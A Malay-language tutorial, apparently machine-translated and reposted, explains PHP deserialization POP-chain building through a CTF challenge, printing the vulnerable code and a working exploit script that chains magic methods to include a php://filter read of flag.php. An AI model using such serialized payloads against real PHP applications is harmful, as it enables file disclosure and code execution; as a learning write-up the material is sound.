Rumah >pembangunan bahagian belakang >tutorial php >Pengenalan terperinci kepada titik pengetahuan tentang pembinaan rantai pop penyahserialisasian PHP

Pengenalan terperinci kepada titik pengetahuan tentang pembinaan rantai pop penyahserialisasian PHP

WBOY
WBOYke hadapan
2022-05-05 18:42:215631semak imbas

Artikel ini membawakan anda pengetahuan yang berkaitan tentang PHP, yang terutamanya memperkenalkan isu berkaitan pembinaan rantai pop ialah sejenis pengaturcaraan berorientasikan atribut, yang sering digunakan untuk membina rantaian panggilan lihat kaedah di bawah, saya harap ia akan membantu semua orang.

Pengenalan terperinci kepada titik pengetahuan tentang pembinaan rantai pop penyahserialisasian PHP

Pembelajaran yang disyorkan: "Tutorial Video PHP"

Sambil kita terus mempelajari lebih lanjut tentang penyahserikatan, mari kita pelajari tentangnya Struktur daripada rangkaian pop. Rantaian pop ini masih sukar difahami bagi orang baru seperti saya. Saya akan menulis artikel ini sekali lagi untuk meringkaskannya dan mendalami pemahaman saya tentang membina rantaian pop. Pada masa yang sama, ia juga memberi sedikit pemahaman kepada rakan-rakan yang ingin menyertai perangkap.

pembinaan rantai pop

Masalah deserialisasi umum, terdapat celah atau tempat di mana kod jahat boleh disuntik dalam kaedah sihir, secara automatik kita boleh memanggil kaedah ajaib. mencapai kesan serangan. Tetapi apabila titik suntikan wujud dalam kaedah kelas biasa, kaedah yang dipanggil secara automatik sebelum ini akan menjadi tidak sah, jadi kita perlu mencari hubungan antara kelas biasa dan kaedah ajaib, memikirkan idea logik, dan menggunakan idea logik ini untuk membina rantai pop untuk mencapai tujuan serangan. Oleh itu, apabila kita melakukan soalan pop jenis ini, kita mesti memberi perhatian kepada kaedah ajaib.

Pengenalan kepada rantai pop

Ia ialah kaedah pengaturcaraan berorientasikan atribut yang sering digunakan untuk membina rantai panggilan. Cari satu siri arahan yang boleh dipanggil dalam kod dalam soalan, dan integrasikan arahan ini ke dalam kod logik yang boleh mencapai kesan serangan berniat jahat, iaitu rantaian pop (pemahaman peribadi, tuan dialu-alukan untuk memberi pendapat) dalam membina rantai pop, kaedah sihir adalah penting. Berikut akan menggunakan contoh untuk menerangkan cara rantai pop dibina, serta idea pembinaan khusus

Kod soalan:

Welcome to index.php
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}

Idea pembinaan

Dalam membina rantai panggilan Apabila , mula-mula cari kepala dan ekor rantai panggilan. Pengepala biasanya merupakan tempat di mana parameter boleh dihantar dan dinyahsiri, manakala ekor biasanya merupakan tempat di mana kod berniat jahat boleh dilaksanakan. Semasa mengaudit kod untuk soalan ini, pengepala menggunakan kaedah get untuk menghantar parameter ke pop, dan ekor termasuk fungsi sertakan. Pada ketika ini, kita semua harus tahu bahawa kita perlu menggunakan pseudo-protocol PHP untuk membaca kod sumber fail bendera. Sekarang kepala dan ekor ditemui, kita juga tahu kaedah serangan. Kemudian cari kaedah ajaib dalam soalan.

__invoke()    当一个类被当作函数执行时调用此方法。

__construct   在创建对象时调用此方法

__toString()  在一个类被当作字符串处理时调用此方法

__wakeup()    当反序列化恢复成对象时调用此方法

__get()       当读取不可访问或不存在的属性的值会被调用

Terdapat sejumlah lima kaedah sihir ini dalam soalan. Kemudian cari hubungan antara kelas biasa dan kaedah sihir.

Tidak sukar untuk melihat bahawa terdapat fungsi preg_match dalam fungsi wakeup, yang digunakan untuk mencari rentetan sensitif dalam sumber Kita boleh bermula dari sini dan menetapkan sumber kepada kelas pertunjukan, kemudian fungsi toString akan dicetuskan secara automatik, jadi sekarang Untuk melanjutkan rantai dalam kaedah tostring, kita boleh menetapkan $this->str kepada kelas ujian dalam kaedah tostring dan membaca pembolehubah sumber dalam kelas ujian (kerana tiada atribut sumber dalam kelas ujian, atribut yang tidak boleh diakses diakses ) secara automatik akan memanggil kaedah get magic. Ia boleh didapati bahawa terdapat panggilan fungsi dalam kaedah get, maka kita boleh menetapkan $this->p kepada kelas Modifier, dan kaedah invoke akan dipanggil secara automatik untuk melaksanakan protokol pseudo PHP yang kita tulis (tetapkan var atribut dalam kelas Modifer kepada kod Hasad kami)

Pada ketika ini, kami membina rantaian pop.

Penjelasan rantai pop

<?php
class Modifier {
	protected $var=&#39;php://filter/read=convert.base64-encode/resource=flag.php&#39;;
}
class Show{
	public $source;
	public $str;
	function _construct(){
		$this->source=$file;
	}
}
class Test{
	public $p;
}
$a = new show();
$b = new show();
$c = new test();
$d = new Modifier();
$a->source=$b;
$b->str=$c;
$c->p= $d;
echo urlencode(serialize($a));
?>

Mula-mula tulis kelas yang digunakan untuk membentuk rangka kerja, dan kemudian nyatakan pembolehubah dalam kelas. Buat seketika kelas yang digunakan secara berasingan Mengapa anda perlu menggunakan rancangan baharu dua kali? kali pertama. sumber = instantiasi kedua pertunjukan)

Cuba gunakan pengekodan url apabila kami membuat siri (terdapat atribut diubah suai yang dilindungi dalam soalan ini, akan ada aksara yang tidak kelihatan)

Pembelajaran yang disyorkan: "Tutorial Video PHP"

Atas ialah kandungan terperinci Pengenalan terperinci kepada titik pengetahuan tentang pembinaan rantai pop penyahserialisasian PHP. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!

Kenyataan:
Artikel ini dikembalikan pada:csdn.net. Jika ada pelanggaran, sila hubungi admin@php.cn Padam